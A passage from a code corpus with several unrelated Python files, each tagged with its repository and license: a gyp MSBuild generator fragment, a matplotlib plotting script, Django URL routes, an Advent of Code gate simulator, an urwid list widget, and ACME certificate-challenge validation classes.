for g in groups:
grouped_sources[g] = []
_AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action)
sources = []
for g in groups:
if grouped_sources[g]:
sources.append(['ItemGroup'] + grouped_sources[g])
if actions_spec:
sources.append(['ItemGroup'] + actions_spec)
return sources
def _AddSources2(spec, sources, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action):
extensions_excluded_from_precompile = []
for source in sources:
if isinstance(source, MSVSProject.Filter):
_AddSources2(spec, source.contents, exclusions, grouped_sources,
extension_to_rule_name, sources_handled_by_action)
else:
if not source in sources_handled_by_action:
detail = []
excluded_configurations = exclusions.get(source, [])
if len(excluded_configurations) == len(spec['configurations']):
detail.append(['ExcludedFromBuild', 'true'])
else:
for config_name, configuration in sorted(excluded_configurations):
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['ExcludedFromBuild',
{'Condition': condition},
'true'])
# Add precompile if needed
for config_name, configuration in spec['configurations'].iteritems():
precompiled_source = configuration.get('msvs_precompiled_source', '')
if precompiled_source != '':
precompiled_source = _FixPath(precompiled_source)
if not extensions_excluded_from_precompile:
# If the precompiled header is generated by a C source, we must
# not try to use it for C++ sources, and vice versa.
basename, extension = os.path.splitext(precompiled_source)
if extension == '.c':
extensions_excluded_from_precompile = ['.cc', '.cpp', '.cxx']
else:
extensions_excluded_from_precompile = ['.c']
if precompiled_source == source:
condition = _GetConfigurationCondition(config_name, configuration)
detail.append(['PrecompiledHeader',
{'Condition': condition},
'Create'
])
else:
# Turn off precompiled header usage for source files of a
# different type than the file that generated the
# precompiled header.
for extension in extensions_excluded_from_precompile:
if source.endswith(extension):
detail.append(['PrecompiledHeader', ''])
detail.append(['ForcedIncludeFiles', ''])
group, element = _MapFileToMsBuildSourceType(source,
extension_to_rule_name)
grouped_sources[group].append([element, {'Include': source}] + detail)
def _GetMSBuildProjectReferences(project):
references = []
if project.dependencies:
group = ['ItemGroup']
for dependency in project.dependencies:
guid = dependency.guid
project_dir = os.path.split(project.path)[0]
relative_path = gyp.common.RelativePath(dependency.path, project_dir)
group.append(
['ProjectReference',
{'Include': relative_path},
['Project', guid],
['ReferenceOutputAssembly', 'false']
])
references.append(group)
return references
def _GenerateMSBuildProject(project, options, version):
spec = project.spec
configurations = spec['configurations']
project_dir, project_file_name = os.path.split(project.path)
msbuildproj_dir = os.path.dirname(project.path)
if msbuildproj_dir and not os.path.exists(msbuildproj_dir):
os.makedirs(msbuildproj_dir)
# Prepare list of sources and excluded sources.
gyp_path = _NormalizedSource(project.build_file)
relative_path_of_gyp_file = gyp.common.RelativePath(gyp_path, project_dir)
gyp_file = os.path.split(project.build_file)[1]
sources, excluded_sources = _PrepareListOfSources(spec, gyp_file)
# Add rules for each configuration
actions_to_add = {}
props_files_of_rules = set()
targets_files_of_rules = set()
extension_to_rule_name = {}
_GenerateRulesForMSBuild(project_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name)
sources, excluded_sources, excluded_idl = (
_AdjustSourcesAndConvertToFilterHierarchy(spec, options,
project_dir, sources,
excluded_sources))
_AddActions(actions_to_add, spec, project.build_file)
_AddCopies(actions_to_add, spec)
# NOTE: this stanza must appear after all actions have been decided.
  # Don't exclude sources with actions attached, or they won't run.
excluded_sources = _FilterActionsFromExcluded(
excluded_sources, actions_to_add)
exclusions = _GetExcludedFilesFromBuild(spec, excluded_sources, excluded_idl)
actions_spec, sources_handled_by_action = _GenerateActionsForMSBuild(
spec, actions_to_add)
_GenerateMSBuildFiltersFile(project.path + '.filters', sources,
extension_to_rule_name)
_VerifySourcesExist(sources, project_dir)
for (_, configuration) in configurations.iteritems():
_FinalizeMSBuildSettings(spec, configuration)
# Add attributes to root element
import_default_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.Default.props'}]]
import_cpp_props_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.props'}]]
import_cpp_targets_section = [
['Import', {'Project': r'$(VCTargetsPath)\Microsoft.Cpp.targets'}]]
macro_section = [['PropertyGroup', {'Label': 'UserMacros'}]]
content = [
'Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003',
'ToolsVersion': version.ProjectVersion(),
'DefaultTargets': 'Build'
}]
content += _GetMSBuildProjectConfigurations(configurations)
content += _GetMSBuildGlobalProperties(spec, project.guid, project_file_name)
content += import_default_section
content += _GetMSBuildConfigurationDetails(spec, project.build_file)
content += import_cpp_props_section
content += _GetMSBuildExtensions(props_files_of_rules)
content += _GetMSBuildPropertySheets(configurations)
content += macro_section
content += _GetMSBuildConfigurationGlobalProperties(spec, configurations,
project.build_file)
content += _GetMSBuildToolSettingsSections(spec, configurations)
content += _GetMSBuildSources(
spec, sources, exclusions, extension_to_rule_name, actions_spec,
sources_handled_by_action)
content += _GetMSBuildProjectReferences(project)
content += import_cpp_targets_section
content += _GetMSBuildExtensionTargets(targets_files_of_rules)
# TODO(jeanluc) File a bug to get rid of runas. We had in MSVS:
# has_run_as = _WriteMSVSUserFile(project.path, version, spec)
easy_xml.WriteXmlIfChanged(content, project.path)
def _GetMSBuildExtensions(props_files_of_rules):
extensions = ['ImportGroup', {'Label': 'ExtensionSettings'}]
for props_file in props_files_of_rules:
extensions.append(['Import', {'Project': props_file}])
return [extensions]
def _GetMSBuildExtensionTargets(targets_files_of_rules):
targets_node = ['ImportGroup', {'Label': 'ExtensionTargets'}]
for targets_file in sorted(targets_files_of_rules):
targets_node.append(['Import', {'Project': targets_file}])
return [targets_node]
def _GenerateActionsForMSBuild(spec, actions_to_add):
"""Add actions accumulated into an actions_to_add, merging as needed.
Arguments:
spec: the target project dict
actions_to_add: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
Returns:
A pair of (action specification, the sources handled by this action).
"""
sources_handled_by_action = set()
actions_spec = []
for primary_input, actions in actions_to_add.iteritems():
inputs = set()
outputs = set()
descriptions = []
commands = []
for action in actions:
inputs.update(set(action['inputs']))
outputs.update(set(action['outputs']))
descriptions.append(action['description'])
cmd = action['command']
# For most actions, add 'call' so that actions that invoke batch files
# return and continue executing. msbuild_use_call provides a way to
# disable this but I have not seen any adverse effect from doing that
# for everything.
if action.get('msbuild_use_call', True):
cmd = 'call ' + cmd
commands.append(cmd)
# Add the custom build action for one input file.
description = ', and also '.join(descriptions)
command = ' && '.join(commands)
_AddMSBuildAction(spec,
primary_input,
inputs,
outputs,
command,
description,
sources_handled_by_action,
actions_spec)
return actions_spec, sources_handled_by_action
def _AddMSBuildAction(spec, primary_input, inputs, outputs, cmd, description,
sources_handled_by_action, actions_spec):
command = MSVSSettings.ConvertVCMacrosToMSBuild(cmd)
primary_input = _FixPath(primary_input)
inputs_array = _FixPaths(inputs)
outputs_array = _FixPaths(outputs)
additional_inputs = ';'.join([i for i in inputs_array
if i != primary_input])
outputs = ';'.join(outputs_array)
sources_handled_by_action.add(primary_input)
action_spec = ['CustomBuild', {'Include': primary_input}]
action_spec.extend(
# TODO(jeanluc) 'Document' for all or just if as_sources?
[['FileType', 'Document'],
['Command', command],
['Message', description],
['Outputs', outputs]
])
if additional_inputs:
action_spec.append(['AdditionalInputs', additional_inputs])
actions_spec.append(action_spec)
| dtebbs/gyp | pylib/gyp/generator/msvs.py | Python | bsd-3-clause | 110,367 |
import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.ticker as tkr
import datetime
import numpy as np
import csv
#x = np.array([datetime.datetime(2013, 9, 28, i, 0) for i in range(24)])
#y = np.random.randint(100, size=x.shape)
data = {}
# read data:
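# Assumed temp_log.csv layout (semicolon-separated, with a header row), e.g.:
#   time;temp
#   1380358800;21.5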
with open('temp_log.csv', 'rb') as csvfile:
logreader = csv.DictReader(csvfile, delimiter=';',quotechar='|', quoting=csv.QUOTE_MINIMAL)
for row in logreader:
for header, value in row.items():
try:
data[header].append(value)
except KeyError:
data[header] = [value]
# prepare data:
x = map(lambda x: datetime.datetime.fromtimestamp(int(x)), data['time'])
y = map(float, data['temp'])  # temperature values arrive as strings; convert for plotting
# actual plotting:
def xfmt(x,pos=None):
''' custom date formatting '''
x = mdates.num2date(x)
label = x.strftime('%m/%d')
label = label.lstrip('0')
return label
plt.plot(x,y)
plt.setp(plt.gca().xaxis.get_majorticklabels(),rotation=90)
plt.gca().xaxis.set_major_formatter(tkr.FuncFormatter(xfmt))
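# Place a labelled major tick every four days and a minor tick for each day.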
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=4))
plt.gca().xaxis.set_minor_locator(mdates.DayLocator())
# Save first; plt.show() is effectively a no-op with the non-interactive Agg
# backend selected above.
plt.savefig('temp_plot.png')
plt.show()
| stefan2904/raspberry-temperature | plot.py | Python | mit | 1,307 |
from django.urls import path
from . import views
app_name = "newsletters"
urlpatterns = [
path('', views.Index.as_view(template_name='newsletters/index.html'), name='newsletters_index'),
path('create/', views.Create.as_view(template_name='newsletters/create.html'), name='newsletters_create'),
path('<int:pk>/', views.Detail.as_view(template_name='newsletters/detail.html'), name='newsletters_detail'),
path('latest/', views.latest, name='newsletters_latest'),
path('edit/<int:pk>/', views.Update.as_view(template_name='newsletters/update.html'), name='newsletters_update'),
path('delete/<int:pk>/', views.Delete.as_view(template_name='newsletters/delete.html'), name='newsletters_delete'),
path('email-version/<int:pk>/', views.Preview.as_view(template_name='newsletters/email-version.html'),
name='newsletters_email'),
path('text-version/<int:pk>/', views.Detail.as_view(template_name='newsletters/plain-email-version.txt',
content_type="text/plain; charset=utf-8"),
name='newsletters_plaintext'),
]
| ashbc/tgrsite | newsletters/urls.py | Python | isc | 1,111 |
class Gate(object):
def clear_gate(self):
self.outputGateCalculated = False
class AndGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGateName = values[1].strip()
self.outputGate = 0
self.outputGateValue = 0
second_pass = values[0].split('AND')
self.inputGate1Name = second_pass[0].strip()
self.inputGate1 = 0
self.inputGate2Name = second_pass[1].strip()
self.inputGate2 = 0
self.outputGateCalculated = False
def __str__(self):
return "AndGate inputGate1 = {0}, inputGate2 = {1}, outputGate = {2}".format(self.inputGate1Name,
self.inputGate2Name,
self.outputGateName)
def hookup(self, gate_list):
if not self.inputGate1Name.isdigit():
input_gate1_attach = filter(filter_for_output_gate(self.inputGate1Name), gate_list)
self.inputGate1 = input_gate1_attach[0]
if not self.inputGate2Name.isdigit():
input_gate2_attach = filter(filter_for_output_gate(self.inputGate2Name), gate_list)
self.inputGate2 = input_gate2_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
if self.inputGate1Name.isdigit():
value1 = int(self.inputGate1Name)
else:
value1 = self.inputGate1.calculate_gate()
if self.inputGate2Name.isdigit():
value2 = int(self.inputGate2Name)
else:
value2 = self.inputGate2.calculate_gate()
self.outputGateValue = value1 & value2
self.outputGateCalculated = True
return self.outputGateValue
class OrGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGateName = values[1].strip()
self.outputGate = 0
self.outputGateValue = 0
second_pass = values[0].split('OR')
self.inputGate1 = 0
self.inputGate1Name = second_pass[0].strip()
self.inputGate2 = 0
self.inputGate2Name = second_pass[1].strip()
self.outputGateCalculated = False
def __str__(self):
return "OrGate inputGate1 = {0}, inputGate2 = {1}, outputGate = {2}".format(self.inputGate1Name,
self.inputGate2Name,
self.outputGateName)
def hookup(self, gate_list):
input_gate1_attach = filter(filter_for_output_gate(self.inputGate1Name), gate_list)
self.inputGate1 = input_gate1_attach[0]
input_gate2_attach = filter(filter_for_output_gate(self.inputGate2Name), gate_list)
self.inputGate2 = input_gate2_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate1.calculate_gate()
value2 = self.inputGate2.calculate_gate()
self.outputGateValue = value1 | value2
self.outputGateCalculated = True
return self.outputGateValue
class LeftShift(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGate = 0
self.outputGateValue = 0
self.outputGateName = values[1].strip()
second_pass = values[0].split('LSHIFT')
self.inputGateName = second_pass[0].strip()
self.inputGate = 0
self.inputValue = int(second_pass[1].strip())
self.outputGateCalculated = False
def __str__(self):
return "LeftShift inputGate = {0}, inputValue = {1}, outputGate = {2}".format(self.inputGateName,
self.inputValue,
self.outputGateName)
def hookup(self, gate_list):
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate.calculate_gate()
left_shift_by = self.inputValue
self.outputGateValue = value1 << left_shift_by
self.outputGateCalculated = True
return self.outputGateValue
class RightShift(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGate = 0
self.outputGateValue = 0
self.outputGateName = values[1].strip()
second_pass = values[0].split('RSHIFT')
self.inputGateName = second_pass[0].strip()
self.inputGate = 0
self.inputValue = int(second_pass[1].strip())
self.outputGateCalculated = False
def __str__(self):
return "RightShift inputGate = {0}, inputValue = {1}, outputGate = {2}".format(self.inputGateName,
self.inputValue,
self.outputGateName)
def hookup(self, gate_list):
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate.calculate_gate()
right_shift_by = self.inputValue
self.outputGateValue = value1 >> right_shift_by
self.outputGateCalculated = True
return self.outputGateValue
class NotGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.outputGateName = values[1].strip()
self.outputGate = 0
self.outputGateValue = 0
second_pass = values[0].split('NOT')
self.inputGateName = second_pass[1].strip()
self.inputGate = 0
self.outputGateCalculated = False
def __str__(self):
return "NotGate inputGate = {0}, outputGate = {1}".format(self.inputGateName, self.outputGateName)
def hookup(self, gate_list):
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
value1 = self.inputGate.calculate_gate()
        # Wires carry 16-bit values, so mask the complement to keep it unsigned.
        self.outputGateValue = ~value1 & 0xFFFF
self.outputGateCalculated = True
return self.outputGateValue
class InputGate(Gate):
def __init__(self, init_string):
values = init_string.split('->')
self.inputGate = 0
self.inputGateName = values[0].strip()
self.outputGate = 0
self.outputGateName = values[1].strip()
self.outputGateValue = 0
self.outputGateCalculated = False
def __str__(self):
return "InputGate inputValue = {0}, outputGate = {1}".format(self.inputGateName, self.outputGateName)
def hookup(self, gate_list):
if not self.inputGateName.isdigit():
input_gate_attach = filter(filter_for_output_gate(self.inputGateName), gate_list)
self.inputGate = input_gate_attach[0]
def calculate_gate(self):
if self.outputGateCalculated:
return self.outputGateValue
if self.inputGateName.isdigit():
self.outputGateValue = int(self.inputGateName)
else:
self.outputGateValue = self.inputGate.calculate_gate()
self.outputGateCalculated = True
return self.outputGateValue
def create_gate(line):
if 'AND' in line:
return AndGate(line)
elif 'OR' in line:
return OrGate(line)
elif 'NOT' in line:
return NotGate(line)
elif 'LSHIFT' in line:
return LeftShift(line)
elif 'RSHIFT' in line:
return RightShift(line)
else:
return InputGate(line)
def filter_for_output_gate(gate_name):
    """Return a predicate matching gates whose output wire is gate_name."""
    def my_filter(x):
return x.outputGateName == gate_name
return my_filter
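# Hypothetical usage sketch (the input file name and target wire below are
# assumptions, not part of the original module):
#
#     lines = open('input.txt').read().splitlines()
#     gates = [create_gate(line) for line in lines]
#     for gate in gates:
#         gate.hookup(gates)
#     wire_a = filter(filter_for_output_gate('a'), gates)[0]
#     print wire_a.calculate_gate()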
| TheYachtingClam/AdventPython | Day7-Some Assembly Required/Gates.py | Python | gpl-3.0 | 8,336 |
# -*- coding: utf-8 -*-
import urwid
class FancyListBox(urwid.LineBox):
def get_listbox(self, items):
class _FancyListBox(urwid.ListBox):
def keypress(_self, size, key):
key = super(_FancyListBox, _self).keypress(size, key)
self.update_corners(_self.ends_visible(size))
return key
def render(_self, size, focus=False):
self.update_corners(_self.ends_visible(size))
return super(_FancyListBox, _self).render(size, focus)
return _FancyListBox(urwid.SimpleListWalker(items))
def __init__(self, items, title="",
tlcorner=u'┌', tline=u' ', lline=u' ',
trcorner=u'┐', blcorner=u'└', rline=u' ',
bline=u' ', brcorner=u'┘'):
#self.length = len(items[2].contents) + 5
try:
x = items[2].contents
        except AttributeError:
x = items[2].get_text()[0]
#self.length = len(items[2].get_text()[0])
self.length = len(x)
self.listbox = self.get_listbox(items)
tline, bline = urwid.Divider(tline), urwid.Divider(bline)
lline, rline = urwid.SolidFill(lline), urwid.SolidFill(rline)
self.tlcorner, self.trcorner = urwid.Text(tlcorner), urwid.Text(trcorner)
self.blcorner, self.brcorner = urwid.Text(blcorner), urwid.Text(brcorner)
title_widget = urwid.Text(self.format_title(title))
tline_widget = urwid.Columns([
tline,
('flow', title_widget),
tline,
])
top = urwid.Columns([
('fixed', 1, self.tlcorner),
tline_widget,
('fixed', 1, self.trcorner),
])
middle = urwid.Columns([
('fixed', 1, lline),
self.listbox,
('fixed', 1, rline),
], box_columns=[0, 2], focus_column=1)
bottom = urwid.Columns([
('fixed', 1, self.blcorner), bline, ('fixed', 1, self.brcorner),
])
pile = urwid.Pile([('flow', top), middle, ('flow', bottom)], focus_item=1)
urwid.WidgetDecoration.__init__(self, self.listbox)
urwid.WidgetWrap.__init__(self, pile)
def top_scroll(self):
self.trcorner.set_text(u"⇧")
self.tlcorner.set_text(u"⇧")
def top_noscroll(self):
self.trcorner.set_text(u"┐")
self.tlcorner.set_text(u"┌")
def bottom_scroll(self):
self.brcorner.set_text(u"⇩")
self.blcorner.set_text(u"⇩")
def bottom_noscroll(self):
self.brcorner.set_text(u"┘")
self.blcorner.set_text(u"└")
def update_corners(self, ends):
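        # 'ends' comes from ListBox.ends_visible(); show arrow glyphs in the
        # corners whenever content is scrolled out of view at that end.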
if 'top' in ends:
self.top_noscroll()
else:
self.top_scroll()
if 'bottom' in ends:
self.bottom_noscroll()
else:
self.bottom_scroll()
| dustinlacewell/console | console/widgets/listbox.py | Python | mit | 2,895 |
"""ACME Identifier Validation Challenges."""
import abc
import functools
import hashlib
import logging
import socket
from cryptography.hazmat.primitives import hashes
import OpenSSL
import requests
from acme import errors
from acme import crypto_util
from acme import fields
from acme import jose
logger = logging.getLogger(__name__)
# pylint: disable=too-few-public-methods
class Challenge(jose.TypedJSONObjectWithFields):
# _fields_to_partial_json | pylint: disable=abstract-method
"""ACME challenge."""
TYPES = {}
@classmethod
def from_json(cls, jobj):
try:
return super(Challenge, cls).from_json(jobj)
except jose.UnrecognizedTypeError as error:
logger.debug(error)
return UnrecognizedChallenge.from_json(jobj)
class ChallengeResponse(jose.TypedJSONObjectWithFields):
# _fields_to_partial_json | pylint: disable=abstract-method
"""ACME challenge response."""
TYPES = {}
resource_type = 'challenge'
resource = fields.Resource(resource_type)
class UnrecognizedChallenge(Challenge):
"""Unrecognized challenge.
ACME specification defines a generic framework for challenges and
defines some standard challenges that are implemented in this
module. However, other implementations (including peers) might
define additional challenge types, which should be ignored if
unrecognized.
:ivar jobj: Original JSON decoded object.
"""
def __init__(self, jobj):
super(UnrecognizedChallenge, self).__init__()
object.__setattr__(self, "jobj", jobj)
def to_partial_json(self):
# pylint: disable=no-member
return self.jobj
@classmethod
def from_json(cls, jobj):
return cls(jobj)
class _TokenChallenge(Challenge):
"""Challenge with token.
:ivar bytes token:
"""
TOKEN_SIZE = 128 / 8 # Based on the entropy value from the spec
"""Minimum size of the :attr:`token` in bytes."""
# TODO: acme-spec doesn't specify token as base64-encoded value
token = jose.Field(
"token", encoder=jose.encode_b64jose, decoder=functools.partial(
jose.decode_b64jose, size=TOKEN_SIZE, minimum=True))
# XXX: rename to ~token_good_for_url
@property
def good_token(self): # XXX: @token.decoder
"""Is `token` good?
.. todo:: acme-spec wants "It MUST NOT contain any non-ASCII
characters", but it should also warrant that it doesn't
contain ".." or "/"...
"""
# TODO: check that path combined with uri does not go above
# URI_ROOT_PATH!
return b'..' not in self.token and b'/' not in self.token
class KeyAuthorizationChallengeResponse(ChallengeResponse):
"""Response to Challenges based on Key Authorization.
:param unicode key_authorization:
"""
key_authorization = jose.Field("keyAuthorization")
thumbprint_hash_function = hashes.SHA256
def verify(self, chall, account_public_key):
"""Verify the key authorization.
:param KeyAuthorization chall: Challenge that corresponds to
this response.
:param JWK account_public_key:
:return: ``True`` iff verification of the key authorization was
successful.
:rtype: bool
"""
parts = self.key_authorization.split('.') # pylint: disable=no-member
if len(parts) != 2:
logger.debug("Key authorization (%r) is not well formed",
self.key_authorization)
return False
if parts[0] != chall.encode("token"):
logger.debug("Mismatching token in key authorization: "
"%r instead of %r", parts[0], chall.encode("token"))
return False
thumbprint = jose.b64encode(account_public_key.thumbprint(
hash_function=self.thumbprint_hash_function)).decode()
if parts[1] != thumbprint:
logger.debug("Mismatching thumbprint in key authorization: "
"%r instead of %r", parts[0], thumbprint)
return False
return True
class KeyAuthorizationChallenge(_TokenChallenge):
# pylint: disable=abstract-class-little-used,too-many-ancestors
"""Challenge based on Key Authorization.
:param response_cls: Subclass of `KeyAuthorizationChallengeResponse`
that will be used to generate `response`.
"""
__metaclass__ = abc.ABCMeta
response_cls = NotImplemented
thumbprint_hash_function = (
KeyAuthorizationChallengeResponse.thumbprint_hash_function)
def key_authorization(self, account_key):
"""Generate Key Authorization.
:param JWK account_key:
:rtype unicode:
"""
return self.encode("token") + "." + jose.b64encode(
account_key.thumbprint(
hash_function=self.thumbprint_hash_function)).decode()
def response(self, account_key):
"""Generate response to the challenge.
:param JWK account_key:
:returns: Response (initialized `response_cls`) to the challenge.
:rtype: KeyAuthorizationChallengeResponse
"""
return self.response_cls(
key_authorization=self.key_authorization(account_key))
@abc.abstractmethod
def validation(self, account_key, **kwargs):
"""Generate validation for the challenge.
Subclasses must implement this method, but they are likely to
return completely different data structures, depending on what's
        necessary to complete the challenge. Interpretation of that
return value must be known to the caller.
:param JWK account_key:
:returns: Challenge-specific validation.
"""
raise NotImplementedError() # pragma: no cover
def response_and_validation(self, account_key, *args, **kwargs):
"""Generate response and validation.
Convenience function that return results of `response` and
`validation`.
:param JWK account_key:
:rtype: tuple
"""
return (self.response(account_key),
self.validation(account_key, *args, **kwargs))
@ChallengeResponse.register
class DNS01Response(KeyAuthorizationChallengeResponse):
"""ACME dns-01 challenge response."""
typ = "dns-01"
def simple_verify(self, chall, domain, account_public_key):
"""Simple verify.
:param challenges.DNS01 chall: Corresponding challenge.
:param unicode domain: Domain name being verified.
:param JWK account_public_key: Public key for the key pair
being authorized.
:returns: ``True`` iff validation with the TXT records resolved from a
DNS server is successful.
:rtype: bool
"""
if not self.verify(chall, account_public_key):
logger.debug("Verification of key authorization in response failed")
return False
validation_domain_name = chall.validation_domain_name(domain)
validation = chall.validation(account_public_key)
logger.debug("Verifying %s at %s...", chall.typ, validation_domain_name)
try:
from acme import dns_resolver
except ImportError: # pragma: no cover
raise errors.DependencyError("Local validation for 'dns-01' "
"challenges requires 'dnspython'")
txt_records = dns_resolver.txt_records_for_name(validation_domain_name)
exists = validation in txt_records
if not exists:
logger.debug("Key authorization from response (%r) doesn't match "
"any DNS response in %r", self.key_authorization,
txt_records)
return exists
@Challenge.register # pylint: disable=too-many-ancestors
class DNS01(KeyAuthorizationChallenge):
"""ACME dns-01 challenge."""
response_cls = DNS01Response
typ = response_cls.typ
LABEL = "_acme-challenge"
"""Label clients prepend to the domain name being validated."""
def validation(self, account_key, **unused_kwargs):
"""Generate validation.
:param JWK account_key:
:rtype: unicode
"""
return jose.b64encode(hashlib.sha256(self.key_authorization(
account_key).encode("utf-8")).digest()).decode()
def validation_domain_name(self, name):
"""Domain name for TXT validation record.
:param unicode name: Domain name being validated.
"""
return "{0}.{1}".format(self.LABEL, name)
@ChallengeResponse.register
class HTTP01Response(KeyAuthorizationChallengeResponse):
"""ACME http-01 challenge response."""
typ = "http-01"
PORT = 80
"""Verification port as defined by the protocol.
You can override it (e.g. for testing) by passing ``port`` to
`simple_verify`.
"""
WHITESPACE_CUTSET = "\n\r\t "
"""Whitespace characters which should be ignored at the end of the body."""
def simple_verify(self, chall, domain, account_public_key, port=None):
"""Simple verify.
        :param challenges.HTTP01 chall: Corresponding challenge.
:param unicode domain: Domain name being verified.
:param JWK account_public_key: Public key for the key pair
being authorized.
:param int port: Port used in the validation.
:returns: ``True`` iff validation with the files currently served by the
HTTP server is successful.
:rtype: bool
"""
if not self.verify(chall, account_public_key):
logger.debug("Verification of key authorization in response failed")
return False
# TODO: ACME specification defines URI template that doesn't
# allow to use a custom port... Make sure port is not in the
# request URI, if it's standard.
if port is not None and port != self.PORT:
logger.warning(
"Using non-standard port for http-01 verification: %s", port)
domain += ":{0}".format(port)
uri = chall.uri(domain)
logger.debug("Verifying %s at %s...", chall.typ, uri)
try:
http_response = requests.get(uri)
except requests.exceptions.RequestException as error:
logger.error("Unable to reach %s: %s", uri, error)
return False
logger.debug("Received %s: %s. Headers: %s", http_response,
http_response.text, http_response.headers)
challenge_response = http_response.text.rstrip(self.WHITESPACE_CUTSET)
if self.key_authorization != challenge_response:
logger.debug("Key authorization from response (%r) doesn't match "
"HTTP response (%r)", self.key_authorization,
challenge_response)
return False
return True
@Challenge.register # pylint: disable=too-many-ancestors
class HTTP01(KeyAuthorizationChallenge):
"""ACME http-01 challenge."""
response_cls = HTTP01Response
typ = response_cls.typ
URI_ROOT_PATH = ".well-known/acme-challenge"
"""URI root path for the server provisioned resource."""
@property
def path(self):
"""Path (starting with '/') for provisioned resource.
:rtype: string
"""
return '/' + self.URI_ROOT_PATH + '/' + self.encode('token')
def uri(self, domain):
"""Create an URI to the provisioned resource.
Forms an URI to the HTTPS server provisioned resource
(containing :attr:`~SimpleHTTP.token`).
:param unicode domain: Domain name being verified.
:rtype: string
"""
return "http://" + domain + self.path
def validation(self, account_key, **unused_kwargs):
"""Generate validation.
:param JWK account_key:
:rtype: unicode
"""
return self.key_authorization(account_key)
@ChallengeResponse.register
class TLSSNI01Response(KeyAuthorizationChallengeResponse):
"""ACME tls-sni-01 challenge response."""
typ = "tls-sni-01"
DOMAIN_SUFFIX = b".acme.invalid"
"""Domain name suffix."""
PORT = 443
"""Verification port as defined by the protocol.
You can override it (e.g. for testing) by passing ``port`` to
`simple_verify`.
"""
@property
def z(self): # pylint: disable=invalid-name
"""``z`` value used for verification.
:rtype bytes:
"""
return hashlib.sha256(
self.key_authorization.encode("utf-8")).hexdigest().lower().encode()
@property
def z_domain(self):
"""Domain name used for verification, generated from `z`.
:rtype bytes:
"""
return self.z[:32] + b'.' + self.z[32:] + self.DOMAIN_SUFFIX
def gen_cert(self, key=None, bits=2048):
"""Generate tls-sni-01 certificate.
:param OpenSSL.crypto.PKey key: Optional private key used in
certificate generation. If not provided (``None``), then
fresh key will be generated.
:param int bits: Number of bits for newly generated key.
:rtype: `tuple` of `OpenSSL.crypto.X509` and `OpenSSL.crypto.PKey`
"""
if key is None:
key = OpenSSL.crypto.PKey()
key.generate_key(OpenSSL.crypto.TYPE_RSA, bits)
return crypto_util.gen_ss_cert(key, [
# z_domain is too big to fit into CN, hence first dummy domain
'dummy', self.z_domain.decode()], force_san=True), key
def probe_cert(self, domain, **kwargs):
"""Probe tls-sni-01 challenge certificate.
:param unicode domain:
"""
# TODO: domain is not necessary if host is provided
if "host" not in kwargs:
host = socket.gethostbyname(domain)
logging.debug('%s resolved to %s', domain, host)
kwargs["host"] = host
kwargs.setdefault("port", self.PORT)
kwargs["name"] = self.z_domain
# TODO: try different methods?
# pylint: disable=protected-access
return crypto_util.probe_sni(**kwargs)
def verify_cert(self, cert):
"""Verify tls-sni-01 challenge certificate.
:param OpensSSL.crypto.X509 cert: Challenge certificate.
:returns: Whether the certificate was successfully verified.
:rtype: bool
"""
# pylint: disable=protected-access
sans = crypto_util._pyopenssl_cert_or_req_san(cert)
logging.debug('Certificate %s. SANs: %s', cert.digest('sha1'), sans)
return self.z_domain.decode() in sans
def simple_verify(self, chall, domain, account_public_key,
cert=None, **kwargs):
"""Simple verify.
Verify ``validation`` using ``account_public_key``, optionally
probe tls-sni-01 certificate and check using `verify_cert`.
:param .challenges.TLSSNI01 chall: Corresponding challenge.
:param str domain: Domain name being validated.
:param JWK account_public_key:
:param OpenSSL.crypto.X509 cert: Optional certificate. If not
provided (``None``) certificate will be retrieved using
`probe_cert`.
:param int port: Port used to probe the certificate.
:returns: ``True`` iff client's control of the domain has been
verified.
:rtype: bool
"""
if not self.verify(chall, account_public_key):
logger.debug("Verification of key authorization in response failed")
return False
if cert is None:
try:
cert = self.probe_cert(domain=domain, **kwargs)
except errors.Error as error:
logger.debug(error, exc_info=True)
return False
return self.verify_cert(cert)
@Challenge.register # pylint: disable=too-many-ancestors
class TLSSNI01(KeyAuthorizationChallenge):
"""ACME tls-sni-01 challenge."""
response_cls = TLSSNI01Response
typ = response_cls.typ
# boulder#962, ietf-wg-acme#22
#n = jose.Field("n", encoder=int, decoder=int)
def validation(self, account_key, **kwargs):
"""Generate validation.
:param JWK account_key:
:param OpenSSL.crypto.PKey cert_key: Optional private key used
in certificate generation. If not provided (``None``), then
fresh key will be generated.
:rtype: `tuple` of `OpenSSL.crypto.X509` and `OpenSSL.crypto.PKey`
"""
return self.response(account_key).gen_cert(key=kwargs.get('cert_key'))
@Challenge.register # pylint: disable=too-many-ancestors
class DNS(_TokenChallenge):
"""ACME "dns" challenge."""
typ = "dns"
LABEL = "_acme-challenge"
"""Label clients prepend to the domain name being validated."""
def gen_validation(self, account_key, alg=jose.RS256, **kwargs):
"""Generate validation.
:param .JWK account_key: Private account key.
:param .JWA alg:
